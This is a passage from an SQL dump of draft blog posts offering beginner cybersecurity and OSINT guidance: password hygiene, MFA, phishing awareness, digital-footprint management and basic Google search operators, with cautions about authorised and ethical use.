Here\'s how you can start:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Understand the Basics</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Learn the key concepts covered in this guide, such as the CIA Triad, types of threats, and core tools.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Read introductory resources, from blogs to beginner-friendly eBooks.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Practice Good Security Habits</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Strengthen your passwords and avoid reusing them across accounts.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Enable MFA and ensure software updates are a regular routine.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] 
[&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Use Cybersecurity Tools</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Install antivirus software and configure a firewall to protect your devices.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Utilize encryption to protect sensitive business and personal files.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"4\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"4\"><b><strong class=\"font-bold\">Get Hands-On Experience</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Take online cybersecurity courses on platforms like Coursera, Udemy, or edX.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Join Capture the Flag (CTF) games to test your knowledge in real-world scenarios.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Explore virtual labs to practice using security tools.</li>\r\n</ul>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"5\">\r\n 	<li class=\"text-body 
font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"5\"><b><strong class=\"font-bold\">Stay Updated</strong></b></li>\r\n</ol>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Regularly follow cybersecurity blogs and industry reports.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Join professional communities to share knowledge and stay informed about emerging threats.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">The Path to Better Cybersecurity Starts Today</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybersecurity is no longer optional; it’s essential in a world where threats evolve daily. Whether you\'re protecting your personal accounts or securing a business network, understanding and implementing the basics of cybersecurity can keep your data safe and reduce risks.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Remember, the key to success is being proactive, persistent, and informed. Armed with these <b><strong class=\"font-bold\">cybersecurity tips</strong></b> and best practices, you’re now well-equipped to defend against cyber threats. For more in-depth guidance or interactive resources on <b><strong class=\"font-bold\">cybersecurity basics</strong></b>, continue exploring trusted blogs and sign up for practical training programs. 
Start small, stay consistent, and grow your security skills over time!</p>', '', NULL, NULL, 1, 'draft', '2024-08-06 05:48:36', '2026-01-12 21:41:44', 'Information Security', 'The Basics of Cybersecurity: A Beginner\'s Guide', '', NULL),
(114, 'How to Secure Yourself Online: from OSINT Perspective', 'how-to-secure-yourself-online-from-osint-perspective', 'In today\'s digital age, online security is more critical than ever. With the increasing use of the internet for various activities, from social networking to financial transactions, safeguarding your online presence has become essential. This blog will delve into how you can secure yourself online from an Open Source Intelligence (OSINT) perspective.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Understanding OSINT</strong></h2>\r\n<strong>Open Source Intelligence (OSINT)</strong> refers to the practice of collecting and analyzing publicly available information from various sources. This information can be gathered from social media, forums, websites, and other online platforms. While OSINT is often used for investigative purposes, it can also be leveraged to enhance personal online security.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>Steps to Secure Yourself Online</strong></h2>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>1. Conduct a Personal OSINT Audit</strong></h2>\r\nStart by conducting an OSINT audit on yourself. This involves searching for your name, email addresses, phone numbers, and other personal information online to see what information is publicly accessible. Use search engines, social media platforms, and specialized OSINT tools to gather this data.<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.isaca.org/credentialing/cybersecurity-audit-certificate\" target=\"_blank\" rel=\"nofollow noopener\">Cybersecurity Audit Certificate - ISACA</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>2. 
Manage Your Digital Footprint</strong></h2>\r\nYour digital footprint consists of all the information you leave behind when using the internet. To manage it effectively:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Review Privacy Settings:</strong> Regularly review and update the privacy settings on your social media accounts to control who can see your information.</li>\r\n 	<li><strong>Limit Personal Information:</strong> Avoid sharing sensitive information such as your home address, phone number, and financial details online.</li>\r\n 	<li><strong>Delete Unnecessary Accounts:</strong> Remove old or unused online accounts to reduce the amount of personal information available.</li>\r\n</ul>\r\n<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.coursera.org/learn/digital-footprint\" target=\"_blank\" rel=\"nofollow noopener\">Digital Footprint - Coursera</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>3. Use Strong, Unique Passwords</strong></h2>\r\nPasswords are the first line of defense against unauthorized access. 
Follow these guidelines:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Create Strong Passwords:</strong> Use a combination of upper and lower case letters, numbers, and special characters.</li>\r\n 	<li><strong>Unique Passwords:</strong> Avoid using the same password for multiple accounts.</li>\r\n 	<li><strong>Password Manager:</strong> Consider using a password manager to store and generate strong passwords.</li>\r\n</ul>\r\n<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.terranovasecurity.com/blog/how-to-create-a-strong-password-in-7-easy-steps\" target=\"_blank\" rel=\"nofollow noopener\">How to Create a Strong Password in 7 Easy Steps - Terranova Security</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>4. Enable Two-Factor Authentication (2FA)</strong></h2>\r\nTwo-factor authentication adds an extra layer of security by requiring a second form of verification in addition to your password. Enable 2FA on all accounts that support it, such as email, social media, and financial services.<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://freedom.press/training/2fa-beginners/\" target=\"_blank\" rel=\"nofollow noopener\">Two-factor Authentication for Beginners - Freedom of the Press Foundation</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>5. Be Wary of Phishing Attacks</strong></h2>\r\nPhishing attacks involve tricking individuals into providing personal information through deceptive emails or websites. 
Protect yourself by:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Verifying Email Sources:</strong> Check the sender\'s email address and look for signs of phishing, such as spelling errors or suspicious links.</li>\r\n 	<li><strong>Avoiding Clicks on Unknown Links:</strong> Do not click on links or download attachments from unknown or untrusted sources.</li>\r\n 	<li><strong>Using Anti-Phishing Tools:</strong> Utilize browser extensions and security software that provide phishing protection.</li>\r\n</ul>\r\n<strong>Training Resource:</strong> <a class=\"break-word hover:text-super hover:decoration-super dark:hover:text-superDark dark:hover:decoration-superDark underline decoration-from-font underline-offset-1 transition-all duration-300\" href=\"https://www.cisa.gov/secure-our-world/teach-employees-avoid-phishing\" target=\"_blank\" rel=\"nofollow noopener\">Teach Employees to Avoid Phishing - CISA</a>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>6. Secure Your Devices</strong></h2>\r\nEnsure that your devices are secure by:\r\n<ul class=\"list-disc pl-8\">\r\n 	<li><strong>Updating Software:</strong> Regularly update your operating system, browsers, and applications to protect against vulnerabilities.</li>\r\n 	<li><strong>Using Antivirus Software:</strong> Install reputable antivirus software to detect and remove malware.</li>\r\n 	<li><strong>Encrypting Data:</strong> Use encryption tools to protect sensitive data on your devices.</li>\r\n</ul>\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>7. Monitor Your Online Presence</strong></h2>\r\nContinuously monitor your online presence to detect any unauthorized use of your information. Set up alerts for your name and other personal details to receive notifications when they appear online.\r\n<h2 class=\"mb-2 mt-6 text-lg first:mt-3\"><strong>8. Educate Yourself on Online Security</strong></h2>\r\nStay informed about the latest online security threats and best practices. 
Follow reputable sources and consider taking online courses or attending webinars on cybersecurity. Securing yourself online requires a proactive approach and continuous effort. By leveraging OSINT techniques, managing your digital footprint, using strong passwords, enabling two-factor authentication, and staying vigilant against phishing attacks, you can significantly enhance your online security. Remember, the more informed and prepared you are, the safer you will be in the digital world.', '', NULL, NULL, 1, 'draft', '2024-08-06 00:58:01', '2026-01-12 21:41:44', 'Information Security', 'How to Secure Yourself Online: from OSINT Perspective', '', NULL),
(115, 'What is OSINT? A Comprehensive Guide for Beginners', 'what-is-osint-a-comprehensive-guide-for-beginners', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Open Source Intelligence (OSINT) is the process of collecting, analyzing, and utilizing publicly available information from various open sources. This could range from social media profiles to publicly accessible databases, news articles, public records, and websites. OSINT is widely used across sectors like cybersecurity, journalism, law enforcement, and even business intelligence to gather actionable insights.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Should You Learn OSINT?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Learning OSINT equips you with valuable skills that can be applied across multiple domains. Here’s why it’s worth exploring:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">Cybersecurity</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">OSINT helps identify vulnerabilities and potential threats by analyzing data and patterns. It’s an essential skill for cybersecurity professionals to proactively safeguard systems.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. <b><strong class=\"font-bold\">Personal Security</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">OSINT enhances your ability to understand and protect your online presence. 
By knowing what information about you is publicly available, you can take steps to safeguard your privacy.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Business Intelligence</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Many enterprises use OSINT to gather insights into competitors, monitor market trends, and gain an edge in their industries.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Benefits of OSINT for Beginners</h2>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Low Cost</strong></b>: OSINT relies on free, publicly available data, making it highly accessible for individuals and small businesses alike.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Comprehensive Insights</strong></b>: Combining multiple sources allows for well-rounded analysis.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Versatility</strong></b>: Whether for personal use, professional development, or organizational strategy, OSINT provides value in numerous contexts.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Getting Started With 
OSINT</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Before you begin, it’s important to understand the basic terminology and tools that make OSINT so effective.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Basic Terminology</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Sources</strong></b>: Websites, social media platforms, public records, news outlets, etc.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Tools</strong></b>: Software and online services designed to gather and interpret data effectively.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Techniques</strong></b>: Proven methods for searching, analyzing, and interpreting open-source information.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Essential Tools for OSINT Beginners</h3>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Google Dorking</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Google Dorking involves using advanced 
search operators to uncover precise information. Examples of operators:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><code>site:</code> - Restrict search results to a specific website (e.g., <code>site:example.com</code>).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><code>filetype:</code> - Find specific file types (e.g., PDFs or spreadsheets).</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><code>intitle:</code> - Search for keywords in the title of web pages.</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Example Use Case:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Search for PDFs on cybersecurity on a specific website:</p>\r\n<pre class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\"><code>site:example.com filetype:pdf intitle:cybersecurity</code></pre>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">A note on scope: the same operators surface misconfigured or accidentally exposed data, such as open directory listings, backup files, or documents that contain credentials (the Google Hacking Database catalogues such queries). Only run them against domains you own or are authorised to assess, and treat anything you find as sensitive rather than as an invitation to download it.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Social Media Search Engines</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like <b><strong class=\"font-bold\">Social Searcher</strong></b> allow you to find user-generated content, mentions, and hashtags across various 
platforms, which can be invaluable for companies or personal research.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Example Use Case:</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Input a username in Social Searcher to retrieve posts, likes, and related profiles.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Public Records Databases</strong></b></li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Platforms like <b><strong class=\"font-bold\">Whitepages</strong></b> and <b><strong class=\"font-bold\">Spokeo</strong></b> are excellent for uncovering publicly accessible information, such as addresses or phone numbers. From a business perspective, monitoring public records can also inform risk assessments or customer data verification.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step-by-Step Guide to Using OSINT</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Follow these steps to begin applying OSINT techniques:</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 1: Start with Google Dorking</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This is a simple yet effective way to gather targeted information using advanced search operators. 
Experiment with combinations of operators based on your research objectives.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 2: Explore Social Media for Insights</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms are rich sources of information. For example:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Use <b><strong class=\"font-bold\">Twitter</strong></b> to search for keywords or hashtags relevant to your inquiry.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use specialized software like <b><strong class=\"font-bold\">Social Searcher</strong></b> to obtain focused results across multiple platforms.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Step 3: Leverage Public Records</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Search platforms like <b><strong class=\"font-bold\">Whitepages</strong></b> or <b><strong class=\"font-bold\">Spokeo</strong></b> to locate information in public records. 
These tools can reveal useful details about individuals or organizations but should always be used ethically and within legal boundaries.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Practical Exercise for Beginners</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To practice, start with yourself or your own organisation rather than a third party: it doubles as an attack-surface review (what could an attacker learn about you?) and avoids the privacy and legal problems of profiling someone who has not consented. If you do pick a public figure, stay within their public role and do not aggregate home addresses, family details or similar personal data. Gather information by combining Google Dorking, social media searches, and public records tools. Document your findings and consider how these insights could be used in practical scenarios like journalism or cybersecurity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Advanced OSINT Techniques for Professionals</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Once you’ve mastered the basics, it’s time to explore advanced tools and techniques that can further elevate your OSINT game.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">1. <b><strong class=\"font-bold\">OSINT Framework</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The OSINT Framework is a curated collection of tools and resources that help streamline the gathering of open-source data. It’s an excellent starting point for developing a systematic approach to research.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">2. 
<b><strong class=\"font-bold\">Data Visualization Tools</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like <b><strong class=\"font-bold\">Maltego</strong></b> or <b><strong class=\"font-bold\">Graph Commons</strong></b> allow you to map relationships and connections within your data visually. For example, security professionals use these tools to create relationship diagrams that track digital attacks or online fraud.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">3. <b><strong class=\"font-bold\">Automated Tools for Efficient Searches</strong></b></h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Automation saves time in OSINT workflows. For instance, tools like:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Spiderfoot</strong></b> automates threat intelligence collection.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Mitaka</strong></b> helps extract domains, IPs, URLs, and other data from text.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tips for Ethical and Effective Use of OSINT</h2>\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong 
